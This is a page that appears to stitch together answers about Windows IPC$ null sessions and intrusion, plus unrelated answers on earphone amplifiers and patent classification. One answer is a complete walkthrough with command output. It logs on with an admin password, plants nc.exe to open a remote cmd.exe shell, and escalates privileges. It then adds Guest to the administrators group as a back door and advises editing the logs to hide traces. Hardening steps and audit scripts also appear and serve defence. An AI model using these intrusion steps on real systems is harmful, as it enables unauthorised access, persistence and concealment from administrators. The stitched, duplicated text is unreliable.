
How does IPC mine

Publish: 2021-04-14 20:15:41
1. 1, How to establish a null (empty) connection and what it is for
Use the command net use \\IP\ipc$ "" /user:"" to establish a null connection with the target (the target must have IPC$ open).
On NT with the default security settings, a null connection lets you enumerate the target's users and shares, access resources with Everyone permissions and read a small part of the registry, which is of little value. On 2000 it is even less useful. It is also inconvenient to carry out and needs tools.

2, Why can't I connect to IPC$
1, Only NT / 2000 / XP and above can establish IPC$. 98 / ME does not have this function.
2, Check that the command is typed correctly. The correct command is: net use \\TargetIP\ipc$ "password" /user:"username"
Be careful not to have too many or too few spaces. When the user name and password contain no spaces, the double quotes around them can be omitted. An empty password is written as "".
3, Analyse the cause from the returned error number:
Error 5, access denied: most likely the user is not an administrator, so elevate privileges first.
Error 51, Windows cannot find the network path: a network problem.
Error 53, network path not found: wrong IP address; the target is switched off; the target's lanmanserver service is not started; the target has a firewall (port filtering).
Error 67, network name not found: the local lanmanworkstation service is not started; the target has deleted IPC$.
Error 1219, the provided credentials conflict with an existing set of credentials: an IPC$ connection to the other side already exists; delete it and connect again.
Error 1326, unknown user name or bad password: the reason is obvious.
Error 1792, an attempt was made to log on but the network logon service was not started.
2. Deleting the IPC$ null connection

Run regedit, go to HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa and change the value data of the value named RestrictAnonymous from 0 to 1.

Delete the shares (one at a time):

net share admin$ /delete
net share c$ /delete
net share d$ /delete (if there are e, f, ... continue deleting)

Now how to close the ports with common vulnerabilities:

1. Close port 139: right-click Network Neighborhood - Properties - right-click Local Area Connection - Properties - Internet Protocol (TCP/IP) - Properties - Advanced - WINS - Disable NetBIOS over TCP/IP - OK.

2. Right-click Network Neighborhood - Properties - Local Area Connection - Properties, untick Client for Microsoft Networks, and also untick File and Printer Sharing for Microsoft Networks.

3. Close port 445: open Registry Editor, go to HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\NetBT\Parameters, add a DWORD value named SmbDeviceEnabled (without quotes) and set it to 0.
4. Close port 3389: right-click My Computer - Properties - Remote, and untick "Allow Remote Assistance invitations to be sent from this computer".
5. Close port 135:
How to close port 135
Windows XP:
Run dcomcnfg, expand Component Services → Computers, right-click My Computer, choose Properties, switch to Default Properties and untick "Enable Distributed COM on this computer"; then switch to Default Protocols and remove "Connection-oriented TCP/IP".

The above options have corresponding registry values, so they can also be changed in the registry:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Ole: change the value of EnableDCOM to "N"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Rpc: delete "ncacn_ip_tcp" from DCOM Protocols. In addition, the Distributed Transaction Coordinator service must be disabled.

After a restart, port 135 is gone.

Close unnecessary services:
In Control Panel, open Administrative Tools, then Services, and close the following items:
Server (disable first, then stop.)
Telnet (disable first, then stop.)
For the sake of your system's security it is better to shut down these two dangerous services.

If you shut down the two services above, your problem should be solved.
3. The IPC vulnerability attack is a very old one and is basically not usable any more. I can simply introduce a few commands; experiment in a virtual machine and don't do anything bad.
First of all, the null-connection vulnerability requires port 139 or 445 to be open. If they are not open it will not work.
Generally port 139 is open, hehe. You can scan with Streamer, X-Scan and other scanners. If the vulnerability is there, you can connect directly with a null connection.
Command: (the address 192.168.0.12 is made up)
net use \\192.168.0.12\ipc$ "" /user:administrator
If the connection succeeds you will be prompted.
net use Z: \\192.168.0.12\c$
This maps the other side's C drive to the local Z drive, and you can see their C drive in My Computer.
Delete the IPC connection with the other side:
net use \\192.168.0.12\ipc$ /del
Upload a trojan, control shutdown, and so on; you can operate as you like. I won't teach that.
4. IPC is short for Internet Process Connection, that is, remote network connection. It is a special feature of Windows NT and Windows 2000. Its characteristic is that only one connection can exist between two IPs at the same time. All right, cut the crap and let's get to the point.

How do you find a host with the IPC vulnerability? In the past I combined a foreign scanning tool (I forget its name) with killusa's letmein; since a lot of the work was done by hand, you can imagine the speed. Now, thanks to Xiaorong's Streamer 2000, finding such a host is too easy. I won't describe the specific operation; refer to the software's documentation.

OK, suppose we have found such a host at 139.223.200.xxx, the administrator account is administrator and the password is 123456. Enter the command line and officially start. Note that the following operations assume the ideal case where the target host does not forbid remote IPC$ connections and has the Schedule service started.
F:\> net use \\139.223.200.xxx\ipc$ "123456" /user:"administrator"
The command completed successfully.
F:\> copy nc.exe \\139.223.200.xxx\admin$
1 file(s) copied.
F:\> net time \\139.223.200.xxx
Current time at \\139.223.200.xxx is 12/25/2000 10:25 AM
Local time (GMT-07:00) at \\139.223.200.xxx is 12/25/2000 10:35 AM
The command completed successfully.
F:\> at \\139.223.200.xxx 10:38 nc -l -p 1234 -t -e cmd.exe
Added a new job with job ID = 0

F:\> telnet 139.223.200.xxx 1234

The commands above are very simple; just refer to the usage of net, at and nc. In this way we have logged on to the remote host. That is the ideal case. However, you may find that the target's Schedule service is not started, so the at command cannot be used and we need to add the following steps:
F:\> at \\139.223.200.xxx 10:38 nc -l -p 1234 -t -e cmd.exe
The service has not been started.
F:\> netsvc \\139.223.200.xxx schedule /start
Service is running on \\139.223.200.xxx

After logging on to the remote host, what can we do? That depends on the account's permissions and the host's security policy. If you don't have enough permissions, try the following steps. First, execute these commands locally:
F:\> copy getadmin.exe \\139.223.200.xxx\admin$
1 file(s) copied.
F:\> copy gasys.dll \\139.223.200.xxx\admin$
1 file(s) copied.

Second, run the following command on the remote host:
C:\WINNT\system32> getadmin

If it succeeds, you are an administrator of this host. Enough authority for you? :-)

So what can we do now? Change the home page? Download the SAM database? All right! There are many methods; I won't list them one by one, refer to the relevant tutorials. I am generally interested in the Word documents and databases on the target host.

In fact, if you put a trojan or a virus on this machine it is easier to do things, but unless you have a deep grudge against him, you'd better not. It's not nice.

Don't forget to leave a back door when you've done what you came for:
C:\WINNT\system32> net user Guest 30906766
net user Guest 30906766
The command completed successfully.

C:\WINNT\system32> net localgroup administrators Guest /add
net localgroup administrators Guest /add
The command completed successfully.

This is a relatively simple back door. If you want to do better, you can make a set of rootkits like on Linux. In fact such things already exist; you just need to use them. Doing damage is so much easier now, with so many idiot-proof tools available. Ah! If you want to protect yourself, how can you do without learning some security knowledge?

Finally we have to fix the logs. Although redp0wer told me that very few administrators read NT logs, I think cleaning them is useful. Where are the NT logs? You can refer to xudi's article. One thing to remember: the log can only be modified, not deleted, or you will give yourself away! :-) There are many command-line tools for this; have a look at some foreign sites.

In fact, with this host you can do a lot more.

Wisdom + perseverance + inspiration = success; that is my experience.
5. 1. Establish the IPC connection: net use \\IP password /user:administrator
2. Change the Telnet service to "automatic": sc \\IP config tlntsvr start= auto (note: there is a space before auto).
3. Start the Telnet service: sc \\IP start tlntsvr
4. Telnet to the server: telnet IP
sc start remoteaccess
In the left pane of Registry Editor expand Server1\HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\..., then find the fDenyTSConnections value in the right pane (as shown in the figure), double-click it, change its value to 0, click OK and close Registry Editor.
6. Strange that you can connect in an Internet cafe..
An ordinary intranet works too.
net use \\ip\ipc$ "password" /user:"account"
A null connection needs no account or password, just "", but its permissions are very low.

About IPC$, null connections and default shares
First of all, we must point out that a null connection and IPC$ are different concepts. A null connection is a session established with the server without trust; in other words, it is anonymous access to the server. IPC$ is a named pipe opened for inter-process communication, which grants the corresponding permissions after verifying a user name and password. Many tools must use IPC$. The default shares are opened for remote management and include all logical drives (C$, D$, E$, ...) and the system directory WinNT or Windows (admin$).

Frequently asked questions and answers:
1, How to establish a null connection and what it is for
Use the command net use \\IP\ipc$ "" /user:"" to establish a null connection with the target (the target must have IPC$ open).
On NT with the default security settings, a null connection lets you enumerate the target's users and shares, access resources with Everyone permissions and read a small part of the registry, which is of little value. On 2000 it is even less useful. It is also inconvenient to carry out and needs tools.

2, Why can't I connect to IPC$
1, Only NT / 2000 / XP and above can create IPC$. 98 / ME does not have this function.
2, Make sure your command is typed correctly. The correct command is: net use \\TargetIP\ipc$ "password" /user:"username"
Be careful not to have too many or too few spaces. When the user name and password contain no spaces, the double quotes around them can be omitted. An empty password is written as "".
3, Analyse the cause from the returned error number:
Error 5, access denied: very likely the user you are using does not have administrator rights, so elevate first.
Error 51, Windows cannot find the network path: a network problem.
Error 53, network path not found: wrong IP address; the target is switched off; the target's lanmanserver service is not started; the target has a firewall (port filtering).
Error 67, network name not found: your lanmanworkstation service is not started; the target has deleted IPC$.
Error 1219, the provided credentials conflict with an existing set of credentials: you already have an IPC$ connection to the other side; delete it and connect again.
Error 1326, unknown user name or bad password: the reason is obvious.
Error 1792, an attempt was made to log on but the network logon service was not started: the target's Netlogon service is not started (this happens when connecting to a domain controller).
Error 2242, the password of this user has expired: the target has an account policy that forces regular password changes.

3, How to open the target's IPC$
First you need a shell that does not depend on IPC$, such as SQL's cmd extension, Telnet or a trojan; of course this shell must have admin rights. Then in that shell run net share ipc$ to open the target's IPC$. As the previous question shows, there are still many conditions for using IPC$; make sure all the related services are running and start any that are not (if you don't know how, see the usage of the net command). If it still doesn't work (for example, there is a firewall you can't kill), I suggest you give up.

4, How to map and access the default shares
Use the command net use Z: \\TargetIP\c$ "password" /user:"username" to map the other side's C drive to your own Z drive, and so on.
If an IPC$ connection to the target already exists, you can access it directly with the IP plus drive letter plus $, for example copy muma.exe \\IP\d$\path\muma.exe. Or map it again, just without a user name and password: net use y: \\IP\d$ and then copy muma.exe y:\path\muma.exe. When the path contains spaces, enclose the whole path in "".

5, How to delete a mapping and an IPC$ connection
The command net use \\IP\ipc$ /del removes the IPC$ connection to a target.
Delete the mapped Z drive with net use Z: /del, and so on.
Use net use * /del to delete all of them; you will be prompted to press y to confirm.

6, What can I do after connecting to IPC$
Connecting to the target's IPC$ with an account that has administrator rights means you can have in-depth "communication" with the other system. You can use all kinds of command-line tools (the pstools series, win2000srvreskit, telnethack, etc.) to gather target information and manage the target's processes and services. If the target has the default shares open (and you can open them for him if not), you can upload a trojan and run it. It can also be uploaded with TFTP or FTP. Tools such as dwrcc, VNC and remoteadmin (trojan) can also control the screen directly. If it is 2000 Server, you can also consider turning on Terminal Services to make control easier. For the use of the tools mentioned here, see their instructions or related tutorials.

7, How to prevent others from using IPC$ and the default shares to break into me
A. One way is to delete both IPC$ and the default shares. But they come back after a restart, so this also needs a registry change.
1, Delete the existing ones:
net share ipc$ /del
net share admin$ /del
net share c$ /del
... (delete whichever others there are)
2, Forbid null connections:
First run regedit and find the key [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa]; change the value of RestrictAnonymous (DWORD) to 00000001. For the Server edition, find the key [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters] and change the value of AutoShareServer (DWORD) to 00000000.
For the Pro edition it is [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters]; change the value of AutoShareWks (DWORD) to 00000000.
If the key mentioned above does not exist, create it and then set the value.
B. The other is to stop the services IPC$ and the default shares depend on (not recommended):
net stop lanmanserver
You may be told that service XXX will also be stopped, do you want to continue, because some secondary services depend on lanmanserver. Generally press y to continue.
C. The simplest is to set a complex password, to prevent brute-forcing the password over IPC$. But if you have other vulnerabilities, IPC$ will make further intrusion easier.
D. Another way is to install a firewall or use port filtering. Leaving the firewall method aside, here is port filtering:
configure local policy to forbid connections to ports 139 / 445.
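The connect step from answer 1 and question 2 of the FAQ above, with the FAQ's table of error numbers turned into a lookup: the function runs net use exactly as the FAQ gives it, reads the "System error N has occurred." that net.exe prints on failure, and reports the FAQ's diagnosis for that number. This is an added example, not code from the FAQ; it assumes a Windows host with net.exe and hypothetical target, user and password values. Leaving -User and -Password empty gives the null connection form net use \\IP\ipc$ "" /user:"".

```powershell
# Added example (not from the FAQ): net use to \\target\ipc$ plus the FAQ's error table.
# Assumptions (hypothetical): a Windows host with net.exe; Target/User/Password are yours.

# The FAQ's table of net use error numbers and their diagnoses.
$IpcErrorReasons = @{
    5    = 'Access denied: the account is not an administrator (or anonymous access is restricted); elevate first'
    51   = 'Windows cannot find the network path: network problem'
    53   = 'Network path not found: wrong IP, target off, target lanmanserver not started, or 139/445 filtered'
    67   = 'Network name not found: local lanmanworkstation not started, or the target deleted IPC$'
    1219 = 'Credential conflict: an IPC$ session to this target already exists; delete it and reconnect'
    1326 = 'Unknown user name or bad password'
    1792 = 'Net Logon service not started on the target (seen against domain controllers)'
    2242 = 'Password expired: the target enforces a password policy'
}

function Connect-IpcShare {
    [CmdletBinding()]
    param(
        [Parameter(Mandatory)] [string] $Target,
        [string] $User = '',
        [string] $Password = ''
    )
    # An empty $Password is handed to net.exe as "" (the FAQ's null-connection form).
    # Assumption: net.exe treats a bare /user: the same as /user:"" (empty user name).
    $output = & net.exe use "\\$Target\ipc$" $Password "/user:$User" 2>&1 | Out-String
    $result = [pscustomobject]@{
        Target  = $Target
        User    = $User
        Success = ($LASTEXITCODE -eq 0)
        Error   = $null
        Reason  = $null
        Raw     = $output.Trim()
    }
    # net.exe reports failures on stderr as e.g. "System error 53 has occurred."
    if (-not $result.Success -and $output -match 'System error (\d+) has occurred') {
        $code = [int] $Matches[1]
        $result.Error  = $code
        $result.Reason = if ($IpcErrorReasons.ContainsKey($code)) { $IpcErrorReasons[$code] }
                         else { 'Not in the FAQ table; read the raw message' }
    }
    return $result
}

function Disconnect-IpcShare {
    param([Parameter(Mandatory)] [string] $Target)
    # The FAQ's "net use \\IP\ipc$ /del"; needed before retrying after error 1219.
    & net.exe use "\\$Target\ipc$" /delete 2>&1 | Out-Null
    return ($LASTEXITCODE -eq 0)
}

# Usage (hypothetical lab host):
# Connect-IpcShare -Target 192.168.56.10                                      # null connection
# Connect-IpcShare -Target 192.168.56.10 -User administrator -Password 'x' | Format-List
# Disconnect-IpcShare -Target 192.168.56.10
```

Success is taken from net.exe's exit code rather than from the absence of an error line, and the error number is read from the text net.exe prints, because net use does not return the Win32 error as its exit code. Error 1219 is the one worth scripting around: call Disconnect-IpcShare and retry instead of typing the delete by hand.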
7. Explanation:
It's fine, because apart from impedance there is another thing called sensitivity. Comparing the TF10, IE80 and ER4PT earphones, I feel the TF10 driven directly by the IPC is the best of the three, while the ER4PT does not perform as well as expected. At the same volume the ER4PT is much quieter and very muffled; the IE80 is average, at most 60%.

With the IPC, the X90 can be driven well except for some sibilance at high frequencies. It shows the earphone's own character and is a powerful tool for vocals. The impedance of the MX90 is 64 ohm.
In addition, the overall performance of the GR07 driven directly by the IPC is unsurprising: it has some problems and is not brilliant. The impedance of this earphone is 50 Ω.
8. There are many articles about IPC$ intrusion on the Internet, and many excellent ones. The attack steps have even become a classic model, so nobody wants to play with it any more.
Even so, I don't think those articles explain it in detail. For rookies touching IPC$ for the first time, a simple list of steps cannot resolve many of their puzzles (search for IPC in any hacking forum and see how many questions there are).
So I wrote this tutorial, which is meant to solve those puzzles. I want to make some confusing questions clear so that we don't keep lingering in the same place! If you still have questions after reading this post, please reply right away.

Second, what is IPC$
IPC$ (Internet Process Connection) is the share "named pipe": a named pipe opened for inter-process communication. It can be used to manage computers remotely and view their shared resources, granting the corresponding permissions after verifying a user name and password.
With IPC$, the connecting party can even establish a null connection with the target host without a user name or password (of course the other machine must have the IPC$ share, otherwise you can't connect), and with this null connection can also get the user list of the target host (although a careful administrator will forbid exporting the user list).
We always talk about the "IPC$ vulnerability", but in fact IPC$ is not a real vulnerability. It is a remote network logon function for the convenience of administrators' remote management, and it also opens the default shares, that is, all logical drives (C$, D$, E$, ...) and the system directory WinNT or Windows (admin$).
All of this was originally intended to make administrators' work easier, but good intentions don't always have good effects: some people with ulterior motives (what motives? I don't know either) use IPC$ to access shared resources, export the user list and probe passwords with dictionary tools, hoping to obtain higher permissions and achieve their hidden purpose.

Puzzle solving:
1) An IPC connection is a remote network logon feature unique to Windows NT and later systems, equivalent to telnet on UNIX. Because IPC$ needs many DLL functions in Windows NT, it cannot run on Windows 9x.
That is to say, only NT / 2000 / XP can establish IPC$ connections; 98 / ME cannot (some friends say a null connection can be established under 98; I don't know whether that's true, but it's 2003 now, so I suggest 98 comrades change their system, 98 is no fun).
2) Even a null connection cannot be established if the other side has turned off the IPC$ share; you still can't connect.
3) Establishing an IPC$ connection does not mean you can view the other side's user list, because the administrator can forbid exporting it.

Third, the role of an IPC$ connection in a hack attack
As mentioned above, even with a null connection you can get a lot of information (information that is often essential in an intrusion) and access part of the shares; if you can log on as a user with certain permissions you get the corresponding permissions; and obviously, if you log on as administrator, hey, I don't need to say more: what u want, u can do.
(Basically it can be summed up as gathering target information, managing the target's processes and services, uploading trojans and running them. If it is 2000 Server you can also consider opening Terminal Services to make control easier. Great, isn't it!)
But don't be happy too soon, because the administrator's password is not so easy to get. Although there are silly administrators who use an empty password or a brain-dead one, they are a minority after all, and it is no longer like before. As people's security awareness improves, administrators are becoming more and more careful, and it will get harder and harder to get the administrator password :(
So in future you will most likely connect with very little or no permission. You will slowly find that IPC$ connections are not omnipotent; when the host doesn't have the IPC$ share open you can't connect at all.
So I think you should not regard IPC$ intrusion as the ultimate weapon, or think it invincible. It's like passing the ball before the shot on the football field: it rarely has a fatal effect, but it's indispensable. I think that is the significance of IPC$ connections in hacking.

Fourth, the relationship between IPC$, null connections, ports 139/445 and the default shares
The relationship between these four may puzzle rookies, but most articles do not explain it specifically. In fact I don't understand it very thoroughly either; it is all summed up from discussions with you. (A BBS with a good discussion atmosphere is a rookie's paradise.)

1) IPC$ and null connections:
An IPC$ connection without a user name and password is a null connection. Once you log on as a user or administrator (that is, an IPC$ connection with a specific user name and password), it naturally can no longer be called a null connection.
Many people may ask: since null connections are possible, why not always use them, why spend so much effort scanning for weak passwords? Ha ha, the reason was given above: when you log on with a null connection you have no permissions (depressing), but when you log on as a user or administrator you have the corresponding permissions (who doesn't want permissions? so scan honestly and don't be lazy).
2) IPC$ and ports 139/445:
IPC$ provides remote logon and access to the default shares; an open port 139 indicates that NetBIOS is in use, and we access shared files and printers through port 139 or 445 (Win2000). So generally speaking an IPC$ connection needs port 139 or 445 to support it.
3) IPC$ and the default shares:
The default shares are opened by default to facilitate administrators' remote management (you can of course turn them off), that is, all logical drives (C$, D$, E$, ...) and the system directory WinNT or Windows (admin$). We can access these default shares through the IPC$ connection (provided the other side has not turned them off).

Fifth, reasons an IPC$ connection fails
The following five reasons are common:
1) Your system is not NT or above.
2) The other side has not opened the IPC$ default share.
3) The other side's port 139 or 445 is not open (blocked by a firewall).
4) Your command is mistyped (a missing space, etc.).
5) The user name or password is wrong (for a null connection this of course doesn't matter).
In addition, you can analyse the cause from the error number returned:
Error 5, access denied: very likely the user you are using does not have administrator rights; elevate first.
Error 51, Windows cannot find the network path: a network problem.
Error 53, network path not found: wrong IP address; the target is switched off; the target's lanmanserver service is not started; the target has a firewall (port filtering).
Error 67, network name not found: your lanmanworkstation service is not started; the target has deleted IPC$.
Error 1219, the provided credentials conflict with an existing set of credentials: you already have an IPC$ connection to the other side; delete it and connect again.
Error 1326, unknown user name or bad password: the reason is obvious.
Error 1792, an attempt was made to log on but the network logon service was not started: the target's Netlogon service is not started (this happens when connecting to a domain controller).
Error 2242, the password of this user has expired: the target has an account policy that forces regular password changes. Besides the reasons above there are other uncertain factors which I can't explain in detail here, so they are left to your own experience and experiments.

Sixth, how to open the target's IPC$ (this paragraph is quoted from related articles)
First you need a shell that does not depend on IPC$, such as SQL's cmd extension, Telnet or a trojan; of course this shell must have admin rights. Then in that shell run net share ipc$ to open the target's IPC$. As seen above, there are still many conditions for using IPC$; make sure all the related services are running and start any that are not (if you don't know how, see the usage of the net command). If it still doesn't work (for example, there is a firewall you can't kill), it is recommended to give up.

Seventh, how to prevent IPC$ intrusion
1, Forbid null connections from enumerating (this does not prevent null connections from being established; quoted from "Dissecting null sessions under Win2000").
First run regedit and find the key [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa]; change the value of RestrictAnonymous (DWORD) to 00000001 (setting it to 2 causes problems, for example some Windows services break).

2, Disable the default shares
1) View local shared resources:
Run - cmd - enter net share
2) Delete the shares (one at a time):
net share ipc$ /delete
net share admin$ /delete
net share c$ /delete
net share d$ /delete (if there are e, f, ... continue deleting)
3) Stop the Server service:
net stop server /y (the Server service starts again after a restart)
4) Modify the registry:
Run - regedit
Server edition: find the key [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters] and change the value of AutoShareServer (DWORD) to 00000000.
Pro edition: find the key [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters] and change the value of AutoShareWks (DWORD) to 00000000.
If the value mentioned above does not exist, create a new one (right-click - New - DWORD value) and then set it.

3, Permanently turn off the service IPC$ and the default shares depend on: lanmanserver, that is, the Server service
Control Panel - Administrative Tools - Services - find the Server service - right-click - Properties - General - Startup type - Disabled

4, Install a firewall (choose the relevant settings), or a port filter (filter out 139, 445, etc.), or set a complex password with a new version of Optimization Master

5, Prevent password brute-forcing through IPC$

(This tutorial is updated from time to time. For the latest version, please visit the official website: caicainiao community http://ccbirds.yeah.net)

Eighth, related commands
1) Establish a null connection:
net use \\IP\ipc$ "" /user:"" (note that this line contains three spaces)

2) Establish a non-null connection:
net use \\IP\ipc$ "password" /user:"username" (also three spaces)

3) Map a default share:
net use Z: \\IP\c$ "password" /user:"username" (maps the other side's C drive to your own Z drive, and so on)
If an IPC$ connection to the target already exists, you can access it directly with IP + drive letter + $; the specific command is net use Z: \\IP\c$

4) Delete an IPC$ connection: net use \\IP\ipc$ /del

5) Delete a share mapping:
net use Z: /del
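The defensive side of the page, question 7 of the FAQ in answer 6 and section seven of answer 8 above (RestrictAnonymous, AutoShareServer/AutoShareWks, SmbDeviceEnabled, removing the default shares, disabling NetBIOS, filtering 139/445), as one audit-and-apply script. This is an added example, not code from either answer: it assumes Windows 8 / Server 2012 or later (for Get-SmbShare and New-NetFirewallRule), an elevated PowerShell, and a reboot afterwards for the NetBT and SmbDeviceEnabled changes to take effect. Function names are mine.

```powershell
# Added example (not from the FAQ or answer 8): audit the settings those sections describe
# and, when asked, apply them. Assumptions: Windows 8 / Server 2012+, elevated shell,
# reboot afterwards for NetBT / SmbDeviceEnabled to take effect.

$LsaKey   = 'HKLM:\SYSTEM\CurrentControlSet\Control\Lsa'
$SrvKey   = 'HKLM:\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters'
$NetBTKey = 'HKLM:\SYSTEM\CurrentControlSet\Services\NetBT\Parameters'

function Get-AutoShareName {
    # Server editions use AutoShareServer, workstation (Pro) editions AutoShareWks.
    $type = (Get-CimInstance Win32_OperatingSystem).ProductType   # 1 = workstation
    if ($type -eq 1) { 'AutoShareWks' } else { 'AutoShareServer' }
}

function Get-RegDword {
    param([string] $Path, [string] $Name)
    # $null when the key or value is missing, which the FAQ says you then create.
    $item = Get-ItemProperty -Path $Path -Name $Name -ErrorAction SilentlyContinue
    if ($null -eq $item) { return $null }
    [int] $item.$Name
}

function Set-RegDword {
    [CmdletBinding(SupportsShouldProcess)]
    param([string] $Path, [string] $Name, [int] $Value)
    if ($PSCmdlet.ShouldProcess("$Path\$Name", "set DWORD = $Value")) {
        if (-not (Test-Path $Path)) { New-Item -Path $Path -Force | Out-Null }
        New-ItemProperty -Path $Path -Name $Name -PropertyType DWord -Value $Value -Force | Out-Null
    }
}

function Test-IpcHardening {
    # One row per setting: what is there now, what the FAQ wants, pass/fail.
    $wanted = @(
        @{ Path = $LsaKey;   Name = 'RestrictAnonymous'; Value = 1 },  # FAQ: 1, not 2 (2 breaks services)
        @{ Path = $SrvKey;   Name = (Get-AutoShareName); Value = 0 },  # default shares stay gone after reboot
        @{ Path = $NetBTKey; Name = 'SmbDeviceEnabled';  Value = 0 }   # answer 2's step for port 445
    )
    foreach ($w in $wanted) {
        $cur = Get-RegDword -Path $w.Path -Name $w.Name
        [pscustomobject]@{ Setting = $w.Name; Current = $cur; Wanted = $w.Value; Pass = ($cur -eq $w.Value) }
    }
    # Admin shares that exist right now (C$, ADMIN$, IPC$ ...), i.e. what "net share" lists.
    foreach ($s in Get-SmbShare | Where-Object { $_.Special }) {
        [pscustomobject]@{ Setting = "share $($s.Name)"; Current = 'present'; Wanted = 'absent'; Pass = $false }
    }
}

function Invoke-IpcHardening {
    [CmdletBinding(SupportsShouldProcess)]
    param([switch] $BlockPorts)   # also add the 139/445 block from FAQ 7 D
    Set-RegDword -Path $LsaKey   -Name RestrictAnonymous   -Value 1
    Set-RegDword -Path $SrvKey   -Name (Get-AutoShareName) -Value 0
    Set-RegDword -Path $NetBTKey -Name SmbDeviceEnabled    -Value 0
    # Disable NetBIOS over TCP/IP on every interface: the registry form of the WINS-tab
    # option in answer 2 (NetbiosOptions 2 = disabled), which closes port 139.
    foreach ($iface in Get-ChildItem "$NetBTKey\Interfaces") {
        Set-RegDword -Path $iface.PSPath -Name NetbiosOptions -Value 2
    }
    # Delete the existing default shares; IPC$ itself is left to "net share ipc$ /delete" as in the FAQ.
    foreach ($s in Get-SmbShare | Where-Object { $_.Special -and $_.Name -ne 'IPC$' }) {
        if ($PSCmdlet.ShouldProcess($s.Name, 'Remove-SmbShare')) { Remove-SmbShare -Name $s.Name -Force }
    }
    if ($BlockPorts -and $PSCmdlet.ShouldProcess('TCP 139,445 inbound', 'New-NetFirewallRule')) {
        New-NetFirewallRule -DisplayName 'Block inbound NetBIOS/SMB (139,445)' -Direction Inbound `
            -Protocol TCP -LocalPort 139,445 -Action Block | Out-Null
    }
}

# Usage:  Test-IpcHardening | Format-Table        # audit only
#         Invoke-IpcHardening -BlockPorts -WhatIf  # dry run, then again without -WhatIf
```

Run the audit first: on a freshly installed machine every row fails, which is exactly the state the two answers describe. The apply function honours -WhatIf on every registry write, share removal and firewall rule, and it deliberately does not stop or disable the Server service (the FAQ's option B), because that also breaks legitimate remote administration; the registry values are what keep the shares from coming back at reboot.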
9. You can log in to the State Intellectual Property Office at http://epub.sipo.gov.cn/ipc.jsp and click "IPC classification query".

10. A detailed information about IPC $intrusion
a nag:
there are many articles about IPC $intrusion on the Internet, and there are many excellent works. The attack steps have even become a classic model, so no one is willing to play with it again.
however, I don't think these articles are detailed, For the rookies who contact IPC $for the first time, a simple list of steps can't answer many of their puzzles (you can search IPC in a hack forum to see how many doubts there are).
so I wrote this tutorial, which is equivalent to solving puzzles. I want to make some confusing and confusing questions clear, so that we don't always linger in the same place! If you still have questions after reading this post, please reply immediately<

Second, what is IPC $
IPC $(Internet process connection) is sharing & quot; Named pipe & quot; It is an open named pipeline for interprocess communication. It can be used to remotely manage computers and view shared resources of computers by verifying user name and password to obtain corresponding permissions
with IPC $, the linker can even establish an empty connection with the target host without user name and password (of course, the other machine must have IPC $sharing, otherwise you can't connect), and with this empty connection, the linker can also get the user list on the target host (but the administrator in charge will prohibit exporting the user list)
we always talk about IPC $vulnerability IPC $vulnerability. In fact, IPC $is not a real vulnerability. It is a remote network login function for the convenience of remote management of administrators, and it also opens the default share, that is, all logical disks (C $, D $, e $...) and system directory WinNT or windows (admin $)
all of these, the original intention is to facilitate the management of administrators, but a good original intention does not necessarily have a good effect, some people with ulterior motives (what is the intention? I also don't know that (a pronoun) will use IPC $to access shared resources, export user list, and use some dictionary tools for password detection, hoping to obtain higher permissions, so as to achieve the purpose of hiding.

Puzzle solving:
1) An IPC$ connection is a remote network logon feature specific to Windows NT and later, roughly equivalent to telnet on UNIX. Because IPC$ depends on many DLL functions that exist only in Windows NT, it cannot run on Windows 9x.
That is, only NT/2000/XP can establish an IPC$ connection; 98/ME cannot (some friends say a null session can be established from 98; I don't know whether that is true, but it is 2003 now, so I suggest the comrades on 98 change systems, 98 is not worth the trouble).
2) Even a null session cannot be established if the other side has turned off the IPC$ share; you still cannot connect.
3) Establishing an IPC$ connection does not mean you can view the other side's user list, because the administrator can prohibit enumeration.

3. The role of an IPC$ connection in an attack
As mentioned above, even with a null session you can obtain a lot of information (information that is often essential to an intrusion) and access some shares. If you can log in as a user with certain permissions, you get those permissions; and if you log in as the administrator, well, I need say no more: whatever you want, you can do.
(In short: gather information about the target, manage the target's processes and services, upload a trojan and run it. If it is a 2000 Server, you can also consider enabling Terminal Services to make control easier. Wonderful!)
But don't celebrate too soon, because the administrator's password is not that easy to get. There are still some careless administrators who use an empty or trivial password, but they are a minority, and it is no longer like the old days. As security awareness improves, administrators become more and more careful and the administrator password gets harder and harder to obtain :(
So in the future you will most likely be connecting with very few or no permissions, and you will slowly find that an IPC$ connection is not omnipotent; when the host has not opened the IPC$ share, you cannot connect at all.
So I think you should not regard IPC$ intrusion as the ultimate weapon, and should not consider it invincible. It is like the pass before the shot on a football pitch: it rarely has a decisive effect, but it is indispensable. That, I think, is the significance of the IPC$ connection in an intrusion.

4. The relationship between IPC$, null sessions, ports 139/445 and the default shares
The relationship between these four may puzzle newcomers, but most articles do not explain it specifically. In fact I don't understand it completely either; all of this was worked out in discussion with you (a BBS with a good discussion atmosphere is a newcomer's paradise).

1) IPC$ and null sessions:
An IPC$ connection made without a user name and password is a null session. Once you log in as a user or as the administrator (that is, an IPC$ connection with a specific user name and password), it is still an IPC$ connection, but it can no longer be called a null session.
Many people will ask: since a null session is possible, why not always use one? Why go to all the trouble of scanning for weak passwords? Ha, the reason was mentioned above: logged in through a null session you have no permissions at all (depressing), whereas logged in as a user or administrator you have the corresponding permissions (and who doesn't want permissions? so scan honestly and don't be lazy).
2) IPC$ and ports 139/445:
IPC$ provides remote logon and access to the default shares. An open port 139 means NetBIOS over TCP/IP is in use; shared files and printers are reached through port 139, or through port 445 (Windows 2000 and later, SMB directly over TCP). So, generally speaking, an IPC$ connection needs port 139 or 445 to be reachable.
3) IPC$ and the default shares:
